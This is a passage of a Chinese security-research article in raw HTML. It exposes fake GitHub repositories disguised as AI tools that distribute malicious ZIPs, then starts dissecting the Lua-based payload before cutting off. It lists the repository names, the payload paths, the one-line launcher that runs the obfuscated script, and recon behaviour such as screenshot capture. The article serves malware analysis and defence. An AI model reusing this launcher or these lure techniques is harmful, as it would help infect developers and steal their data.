rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">针对 AI 应用开发</span></strong><span leaf="">：伪装成大模型接入工具的 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">kimi-voxel</span></code><span leaf=""> 和 AI 开发规范配置工具 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">ai-specs</span></code><span leaf="">；</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">针对 SaaS 编排</span></strong><span leaf="">：伪装成 OpenAI 兼容 API 服务的 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">flow2api</span></code><span leaf="">（</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">api_flow_1.0</span></code><span leaf="">）；</span></p></li></ul><h4 data-line="50" style="margin: 2em 8px 0.5em;color: rgb(0, 82, 217);font-size: calc(17.6px);font-weight: bold;"><span leaf="">3.1 仓库矩阵全景</span></h4><p data-line="52" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">以下是我们确认的全部仿冒仓库及其恶意载荷下载地址：</span></p><p style="max-width: 100%;overflow-x: auto;"><table style="border-collapse:separate;border-spacing:0px;border-radius:6px;margin:1em auto;color:rgb(51, 51, 51);box-shadow:none;border:1px solid rgb(208, 215, 227);width:543px;"><thead><tr><th data-colwidth="166" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">GitHub 账号</span></p></th><th data-colwidth="119" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">仓库名</span></p></th><th data-colwidth="106" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">伪装主题</span></p></th><th data-colwidth="152" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">恶意 ZIP 路径</span></p></th></tr></thead><tbody><tr><td data-colwidth="166" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">damiansilverado</span></code></td><td data-colwidth="119" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">xhs_one_spider</span></code></td><td data-colwidth="106" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">某社交平台 APP 数据爬虫</span></p></td><td data-colwidth="152" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">ferryway/one-xhs-spider-v1.7.zip</span></code></td></tr><tr><td data-colwidth="166" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">adeelakhit</span></code></td><td data-colwidth="119" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">kimi-voxel</span></code></td><td data-colwidth="106" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">Kimi AI 体素引擎</span></p></td><td data-colwidth="152" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">src/gpu/terrain/gpu/voxel-kimi-resistively.zip</span></code></td></tr><tr><td data-colwidth="166" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">sanjusathian</span></code></td><td data-colwidth="119" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">ai-specs</span></code></td><td data-colwidth="106" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">AI 开发规范配置</span></p></td><td data-colwidth="152" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">ai-specs/.agents/ai-specs-1.5.zip</span></code></td></tr><tr><td data-colwidth="166" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">arashfr933</span></code></td><td data-colwidth="119" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">flow2api</span></code></td><td data-colwidth="106" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">OpenAI 兼容 API 服务</span></p></td><td data-colwidth="152" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">src/core/api_flow_1.0.zip</span></code></td></tr></tbody></table></p><figure data-line="61" style="margin: 1.5em 8px;color: rgb(51, 51, 51);"><span leaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-croporisrc="https://mmbiz.qpic.cn/mmbiz_png/jHUbrwW0VwXMWicMW5Jq1L8CzGybYxiaZSKJNJRgcTtJyKaCGp7UtHwFiaCMGAaNicfic9KooTUcia9OwhGziav2hNibyS5BFqlyYNUicM9umaibMRhwQ/0?wx_fmt=png&amp;from=appmsg" data-cropselx2="530" data-cropsely2="278" data-imgfileid="100027793" data-ratio="0.5245989304812835" data-s="300,640" style="display: block;max-width: 100%;margin: 0.5em auto 1em;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 12px;" data-type="png" data-w="3740" src="https://wechat2rss.xlab.app/img-proxy/?k=e2ae5e5a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FjHUbrwW0VwXMWicMW5Jq1L8CzGybYxiaZSKJNJRgcTtJyKaCGp7UtHwFiaCMGAaNicfic9KooTUcia9OwhGziav2hNibyS5BFqlyYNUicM9umaibMRhwQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span><figcaption style="text-align: center;color: rgb(136, 136, 136);font-size: 0.8em;"><span leaf="">damiansilverado/xhs_one_spider 仓库主页截图</span></figcaption></figure><figure data-line="63" style="margin: 1.5em 8px;color: rgb(51, 51, 51);"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.5261464199517297" data-s="300,640" data-type="png" data-w="3729" style="display: block;max-width: 100%;margin: 0.5em auto 1em;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 12px;" data-croporisrc="https://mmbiz.qpic.cn/sz_mmbiz_png/jHUbrwW0VwXQk9H7QsyZViaNl7HxzicV243iaWWN5SKtBHic7jW2X3vsEMGt1icGruJVIbicDLXJD92F2O2bYHhuN9sTQAy2wibIqFoPgUGCOhzFVY/0?wx_fmt=png&amp;from=appmsg" data-cropselx2="530" data-cropsely2="279" data-imgfileid="100027796" src="https://wechat2rss.xlab.app/img-proxy/?k=0d149c27&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FjHUbrwW0VwXQk9H7QsyZViaNl7HxzicV243iaWWN5SKtBHic7jW2X3vsEMGt1icGruJVIbicDLXJD92F2O2bYHhuN9sTQAy2wibIqFoPgUGCOhzFVY%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span><figcaption style="text-align: center;color: rgb(136, 136, 136);font-size: 0.8em;"><span leaf="">sanjusathian/ai-specs 仓库主页截图</span></figcaption></figure><figure data-line="65" style="margin: 1.5em 8px;color: rgb(51, 51, 51);"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.5255826413072596" data-s="300,640" data-type="png" data-w="3733" style="display: block;max-width: 100%;margin: 0.5em auto 1em;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 12px;" data-croporisrc="https://mmbiz.qpic.cn/mmbiz_png/jHUbrwW0VwUOsGhccnYWpmm6eDwKG211QrbbKPE61ANOgmfJEuRekYVbLpWIwOpStED80d3KXbVRK9RCqOn8AFvHmOH4ZTznxM6ibFhc2arU/0?wx_fmt=png&amp;from=appmsg" data-cropselx2="530" data-cropsely2="279" data-imgfileid="100027795" src="https://wechat2rss.xlab.app/img-proxy/?k=1d23f707&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FjHUbrwW0VwUOsGhccnYWpmm6eDwKG211QrbbKPE61ANOgmfJEuRekYVbLpWIwOpStED80d3KXbVRK9RCqOn8AFvHmOH4ZTznxM6ibFhc2arU%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span><figcaption style="text-align: center;color: rgb(136, 136, 136);font-size: 0.8em;"><span leaf="">arashfr933/flow2api 仓库主页截图</span></figcaption></figure><h4 data-line="67" style="margin: 2em 8px 0.5em;color: rgb(0, 82, 217);font-size: calc(17.6px);font-weight: bold;"><span leaf="">3.2 解剖一个&#34;完美诱饵&#34;：</span><code style="font-size: 15.84px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">ai-specs</span></code><span leaf=""> 的文字套路</span></h4><p data-line="69" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">五个仓库的 README 呈现出高度一致的结构，这是 AI 批量生成内容的典型指纹。以 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">sanjusathian/ai-specs</span></code><span leaf=""> 为例，其仓库描述为：</span></p><blockquote style="font-style: italic;padding: 1em 1em 1em 2em;border-left: 4px solid rgb(0, 82, 217);border-radius: 0px 6px 6px 0px;color: rgba(0, 0, 0, 0.6);background: rgb(247, 247, 247);margin-bottom: 1em;box-shadow: none;"><p data-line="71" style="display: block;font-size: 1em;letter-spacing: 0.1em;color: rgb(51, 51, 51);margin: 0px;"><span leaf="">📁 </span><em style="font-style: italic;font-size: inherit;"><span leaf="">Streamline AI development with comprehensive rules and configurations for consistent, high-quality coding across multiple AI copilots.</span></em></p></blockquote><blockquote style="font-style: italic;padding: 1em 1em 1em 2em;border-left: 4px solid rgb(0, 82, 217);border-radius: 0px 6px 6px 0px;color: rgba(0, 0, 0, 0.6);background: rgb(247, 247, 247);margin-bottom: 1em;box-shadow: none;"><p data-line="73" style="display: block;font-size: 1em;letter-spacing: 0.1em;color: rgb(51, 51, 51);margin: 0px;"><span leaf="">（中文翻译：通过全面的规则和配置简化 AI 开发，确保多个 AI 副驾驶的一致性和高质量编码。）</span></p></blockquote><p data-line="75" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">这句话读起来专业、权威——&#34;AI 开发规范配置&#34;确实是一个真实存在的开发者需求（如 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">.cursorrules</span></code><span leaf="">、Copilot 指令文件），攻击者精准踩中了这个痛点。但仔细审视 README 的内容，六处破绽逐一浮现：</span></p><p data-line="77" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">① 标题 emoji 堆砌，内容空洞</span></strong><span leaf="">：每个章节都有 emoji 装饰（</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">🚀 Getting Started</span></code><span leaf="">、</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">📥 Download Now</span></code><span leaf="">、</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">✅ System Requirements</span></code><span leaf="">），营造出活跃开源项目的视觉感，但功能描述极度空洞——</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">Select AI Configurations / Set Development Rules / Save Your Settings</span></code><span leaf="">，没有任何具体的技术细节。</span></p><p data-line="79" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">② 安装步骤暴露 AI 生成的逻辑漏洞</span></strong><span leaf="">：README 的&#34;安装步骤&#34;第 4 步写道：</span></p><blockquote style="font-style: italic;padding: 1em 1em 1em 2em;border-left: 4px solid rgb(0, 82, 217);border-radius: 0px 6px 6px 0px;color: rgba(0, 0, 0, 0.6);background: rgb(247, 247, 247);margin-bottom: 1em;box-shadow: none;"><p data-line="81" style="display: block;font-size: 1em;letter-spacing: 0.1em;color: rgb(51, 51, 51);margin: 0px;"><em style="font-style: italic;font-size: inherit;"><span leaf="">Double-click on the application file. This may be named </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf=""><a href="https://raw.githubusercontent.com/.../ai-specs-1.5.zip" target="_blank">https://raw.githubusercontent.com/.../ai-specs-1.5.zip</a></span></code><span leaf=""> for Windows.</span></em></p></blockquote><p data-line="83" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">把一个 HTTP 下载链接当作&#34;应用程序文件名&#34;——这是 AI 生成内容在逻辑自洽但现实荒谬时的典型特征。真实的开源工具不会把 raw URL 写进安装说明。</span></p><p data-line="85" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">③ 恶意 ZIP 藏在隐藏目录</span></strong><span leaf="">：载荷路径为 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">ai-specs/.agents/ai-specs-1.5.zip</span></code><span leaf="">，</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">.agents</span></code><span leaf=""> 是以点号开头的隐藏目录，在 GitHub 网页界面默认折叠，进一步降低被发现的概率。</span></p><p data-line="87" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">④ 系统需求千篇一律</span></strong><span leaf="">：五个仓库的系统需求几乎完全相同——Windows 10+、macOS 10.14+、4 GB RAM、200–500 MB 磁盘空间——这是同一套 AI 提示词批量生成的直接证据。</span></p><p data-line="89" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">⑤ 贡献指南作为可信度背书</span></strong><span leaf="">：每个仓库都有&#34;欢迎贡献&#34;章节，Fork → Edit → Pull Request 三步流程，模拟真实开源项目的社区氛围，降低受害者的警惕心。</span></p><p data-line="91" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">⑥ 仓库名与内容语义断裂</span></strong><span leaf="">：</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">kimi-voxel</span></code><span leaf=""> 的 README 描述的是一个&#34;体素游戏引擎&#34;，与 Kimi AI 毫无关系；</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">ai-specs</span></code><span leaf=""> 声称是&#34;AI 开发规范&#34;，但安装步骤是双击 ZIP 运行一个&#34;应用程序&#34;。攻击者只需要仓库名包含热门关键词，内容是否自洽并不重要。</span></p><p data-line="93" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">这些仓库不仅有 AI 生成的完善文档，甚至在账号注册时间、仓库创建节奏上都呈现出工业化批量操作的痕迹。这种工业化伪造矩阵的存在，标志着供应链投毒已从早期的&#34;单点突袭&#34;进化为&#34;生态化围猎&#34;。对于攻击者而言，只要有一个诱饵被开发者选中，整个&#34;致命分身&#34;的感染逻辑就会瞬间启动。</span></p><figure data-line="95" style="margin: 1.5em 8px;color: rgb(51, 51, 51);"><span leaf=""><img alt="FakeGit 开源矩阵关联图" class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100027785" data-ratio="1.490566037735849" style="display: block;max-width: 100%;margin: 0.5em auto 1em;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 12px;" data-type="png" data-w="848" src="https://wechat2rss.xlab.app/img-proxy/?k=1a5351e2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FjHUbrwW0VwWyhq8tga0m9Dibv4c1GFnxibVz8ESb6vRWm8fuSlvEK4WQ9MaRTic7hkiboricYHHdCLH3l79QTxVJsoZQxib8Qu3KGJicgS3VaUJKVk%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span><figcaption style="text-align: center;color: rgb(136, 136, 136);font-size: 0.8em;"><span leaf="">FakeGit 开源矩阵关联图</span></figcaption></figure><h2 data-line="98" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 2.5em auto 1.5em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;"><span leaf="">二、 样本解剖：Lua/Agent.BT 变体的完整执行链路</span></h2><p data-line="100" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">在揭露了 FakeGit 矩阵的宏观布局后，我们将镜头拉近到单个样本的微观世界。然而，等待我们的第一个挑战，是这个样本在静态分析层面构筑的铜墙铁壁——针对 FakeGit 矩阵核心载荷 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">gcc.exe</span></code><span leaf="">(a5edd208f0f92184a06b9dfb8eb5acee)的分析，静态逆向面临严重阻碍。本节将按照实际执行时序，分三个阶段详细阐述其混淆机制、运行时行为与底层规避技术，以及我们在 Linux 环境中利用原生 LuaJIT 配合&#34;假 PE 内存映像&#34;与&#34;透明仿真层&#34;实现动态突围的完整技术链路。</span></p><hr style="border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;margin: 2em 0px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));"/><h3 data-line="104" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">阶段一：</span><code style="font-size: 17.28px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">ptd.txt</span></code><span leaf=""> — 侦察与热补丁获取</span></h3><h4 data-line="106" style="margin: 2em 8px 0.5em;color: rgb(0, 82, 217);font-size: calc(17.6px);font-weight: bold;"><span leaf="">1.1 静态对抗：高强度 Lua VM 混淆与常量池</span></h4><p data-line="108" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">分发包中的可执行文件 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">gcc.exe</span></code><span leaf=""> 实为剥离了符号表的合法 </span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">LuaJIT 2.1.0-beta3</span></strong><span leaf=""> 解释器。真正的恶意逻辑位于同目录下的 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">ptd.txt</span></code><span leaf=""> 文件中。受害者解压后点击 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">Launch.cmd</span></code><span leaf="">，其内部仅有一行：</span></p><div style="margin: 10px 8px;border-radius: 8px;border: 1px solid rgb(200, 208, 219);background: rgb(234, 238, 243);overflow: hidden;"><p style="text-align: right;padding: 4px 10px 2px;background: rgb(212, 218, 226);border-bottom: 1px solid rgb(200, 208, 219);"><span style="font-size: 11px;line-height: 1.4;color: rgb(58, 80, 112);font-family: &#34;Fira Code&#34;, Menlo, &#34;Operator Mono&#34;, Consolas, Monaco, monospace;letter-spacing: 0px;"><span leaf="">cmd</span></span></p><pre style="margin: 0px;border: none;border-radius: 0px;box-shadow: none;background: transparent;font-size: 14.4px;line-height: 1.5;overflow-x: auto;padding: 0px !important;"><code language="cmd" style="display: block;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0px;color: rgb(0, 25, 58);white-space: nowrap;word-break: normal;overflow-wrap: normal;margin: 0px;font-size: inherit;line-height: inherit;border: none;border-radius: 0px;background: transparent !important;"><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">start</span></span><span leaf=""> gcc.exe ptd.txt</span></p></code></pre></div><p data-line="114" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">ptd.txt</span></code><span leaf=""> 是一段应用了高强度自定义 VM 混淆的单行 Lua 脚本。其并未采用传统的 Base64 编码，而是依赖极度碎片化的动态组装：</span></p><ol style="list-style-type: decimal;padding-left: 1.5em;margin-left: 0px;color: rgb(51, 51, 51);" class="list-paddingleft-1"><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">庞大的 P Table</span></strong><span leaf="">：代码中嵌入了体积高达 114KB 的加密常量池（全局表 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">h</span></code><span leaf="">），被数以百计的加减运算频繁引用。</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">动态表索引解密</span></strong><span leaf="">：脚本通过数百个自定义解密函数（如 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">WU({...})</span></code><span leaf="">、</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">iU({...})</span></code><span leaf="">），利用复杂的表索引和数组偏移，在运行时拼接 API 名称与逻辑片段。</span></p></li></ol><p data-line="119" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">这种强度的混淆导致控制流图（CFG）彻底平坦化，常规的静态还原工具无法有效工作。</span></p><h4 data-line="121" style="margin: 2em 8px 0.5em;color: rgb(0, 82, 217);font-size: calc(17.6px);font-weight: bold;"><span leaf="">1.2 运行时行为：PEB 遍历 → 地理探测 → 截图采集</span></h4><p data-line="123" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">静态分析受阻后，动态执行揭示了 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">ptd.txt</span></code><span leaf=""> 阶段的完整侦察逻辑：</span></p><p data-line="125" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">执行流程</span></strong><span leaf="">：</span></p><ol style="list-style-type: decimal;padding-left: 1.5em;margin-left: 0px;color: rgb(51, 51, 51);" class="list-paddingleft-1"><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p data-line="127" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">PEB 遍历与 API 解析</span></strong><span leaf="">：样本通过 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">GS:[0x60]</span></code><span leaf=""> 读取进程环境块（PEB），遍历 </span><code style="font-size: 